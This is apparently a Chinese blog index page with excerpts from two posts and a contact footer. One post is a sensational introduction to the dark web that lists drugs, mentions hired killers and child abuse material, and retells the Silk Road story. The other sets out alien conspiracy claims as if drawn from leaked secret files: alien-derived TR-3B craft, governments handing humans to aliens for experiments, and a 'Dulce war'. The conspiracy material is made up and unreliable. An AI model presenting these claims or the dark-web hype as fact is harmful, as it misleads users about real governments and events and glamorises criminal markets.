    你一直以为互联网是一个扁平化的,自由开放的世界?那么,你错了。 不管墙内还是墙外,我们能通过 Google 或 Bing 等标准搜索引擎访问到的数据只有 4%,仅仅是冰山一角,它被统称为表层网络。 其余的 96%,都隐藏在一个叫「深网」(Deep Web)的地方,它是一个数据规模足有表层网络 400 多倍的「地下世界」,哪怕你是**屏蔽敏感词**高手,也发现不了它的蛛丝马迹。 当中最神秘的,是隐藏深网之中的「暗网」(Dark Web)。对于追随者来说,「暗网」是一个令人心驰神往的乐园,散发着致命吸引力。 你需要通过特定的路由器才能进入「暗网」,好比一个人戴上面具隐藏身份,才能进入一个空间。 电影大师库布里克电影《大开眼戒》有段这样的描述:「无论你是什么身份,踏入古堡那一刻,你都必须戴上面具。」 人为什么需要完美地匿名呢?当真正推开那扇大门,你就会懂了。 暗网是什么? 在暗网,你可以找到现实世界中没有的一切。 明码标价的毒品和致幻剂:哥伦比亚可卡因、阿富汗 4 号海洛因、草莓**屏蔽敏感词**、Caramello 、可卡因片、XTC、摇头丸(MDMA)、黑焦油海洛因…… 「为了钱我可以做任何事。不要误会,我不是鸡。但如果你要我毁掉一桩生意和一个人的生活,我很乐意效劳。」 这已经是「暗网」口味最轻的一桩买卖。总之只要你有比特币,就能找到人为你做任何事。 因为完全隐匿了真实的身份,「暗网」是一个绝对自由的世界。不管是无政府主义、恋童癖,还是杀人犯,你都可以 100% 地袒露自己,无需顾忌法律或世俗的眼光。 世界最大暗网帝国,现代商业的「奇迹」 让暗网在现实世界声名大噪的,是这个以绿色驼队作为 logo 的网站--「丝绸之路」。一手创立这个毒品帝国的,则是一个叫罗斯·乌布里希(Ross Ulbricht)的年轻人。 正是他,把「丝绸之路」变成世界上第一个也是最大的网络黑市。 毒品是网站主要出售的商品,这里的一切都明码标价,并且只支持比特币交易。除此以外,你还可以在这里买到无登记的手枪,雇用私人杀手,甚至获得儿童色情服务。 在完美隐藏身份的情况下,DPR 以每个订单抽取 10% 的价格,赚进了大把大把的美元。 「丝绸之路」被称为现代商业上的一个完美奇迹,如果它出售的不是毒品的话。 出身中产家庭,自由主义信奉者 乌布里希的童年与其他美国青少年无异,出生在中产家庭,生活殷实,童年时代无忧无虑。如果要说有哪点不同,那就是他喜欢体验迷幻剂,研究东方哲学和经济学,同时还是一个自由意志主义的信奉者。 比特币的出现,成为了他人生中最重要的转折点。 QQ群号:979727860 点击链接加入群聊:...

    2020-03-29 1010
  • 暗网传说:被封锁的外星生物科技

    2002年,一位世界级的超级骇客盖瑞麦金儂在骇进美国军方资料库后,陆续破解美国政府各单位的资料库,取得许多极机密的资料,并公开散佈在表网上。 大部份资料为各国政府情报,但其中有些资料,却是与外星生命体,与美国的太空计画有关。 不过,在他被逮捕后,美国政府禁止这些资料继续在表网流传,因此这些资料也陆续地从表网中消失。数年后,暗网的一些外星人论坛中,却又再出现盖瑞麦金儂当时所放出的资料,在这些暗网论坛中,最有名的就是Paranormal aliens n’ shit网站。 这个网站专门放一些在表网被禁的外星人机密档案,包括文件、影片或录音等,但也因为美国联邦调查局的介入,导致这个论坛连暗网都无法待下去,暂时消失在这个世界上。 幸好在论坛消失前,有许多的外国网友,将所有的资料收集起来,待风声鹤唳的时期过了后,再陆续放回到表网的各个论坛,甚至YouTube等视讯网站。 其中比较诡异的是,美国所研发的TR-3B飞行物。这个飞行物外形为黑色三角形,会以飘浮的方式,垂直升降。过去美国有许多不知情的民眾,见到一个黑色三角形的飞行物,在空中移动,以為见到了不明飞行物,但其实就是这个秘密武器,许多国内外的网站,陆续介绍过这个飞行物。 然而,最令人疑惑的是,美国之外的国家,如法国、俄罗斯、比利时、德国等欧洲国家的天空,居然也出现了类似TR-3B的飞行物,依照美国政府的作风,这类型的机密研究,是不可能在其它国家公开,但这些国家都出现了类似的飞行物,於是在Paranormal aliens n’ shit网站,就曾出现相关的机密文件。 据文件解释,美国在负责与外星人通讯的第51区,与外星文化交涉后,取得部份外星科技的研发成果,并陆续导入至国家的几项研究计画中,而TR-3B则是其中一项。 虽然这些外星人将高等的科技交给美国,但实际上,是要进行有条件的交换,其条件之一,就是要取得人类。这是由于它们想要研究人类,并进行一些实验。 只是这些实验异常残忍,因为外星人将人类当作是众多地球的生物之一,它们想要瞭解地球人的人体构造,甚至计划进行人类与外星生物的交配繁殖,让被交易过去的人类,与不同的外星生物进行交配。美国甚至在道西镇,开放了一个基地,并提供大量的人类让外星人进行研究。 然而,在道西战争发生后,外星人认为美国政府背信忘义,放任人民攻打它们,因此愤而与德国、俄罗斯、法国等欧洲大国接触,并将交给美国政府的一些研发成果,再转交给这些国家。 这些欧洲大国為了要追上美国的科技,於是与外星人谈判,提供足够的人类给它们研究,以换取一些外星高科技,这也是许多人很惊讶,為何美国研发的TR-3B会突然出现在德国、俄罗斯、法国的上空。 QQ群号:979727860 点击链接加入群聊:...

    2020-03-29 1054
  • 联系我们

    在线咨询:点击这里给我发消息

    QQ交流群:KirinBlog

    工作日:8:00-23:00,节假日休息

    扫码关注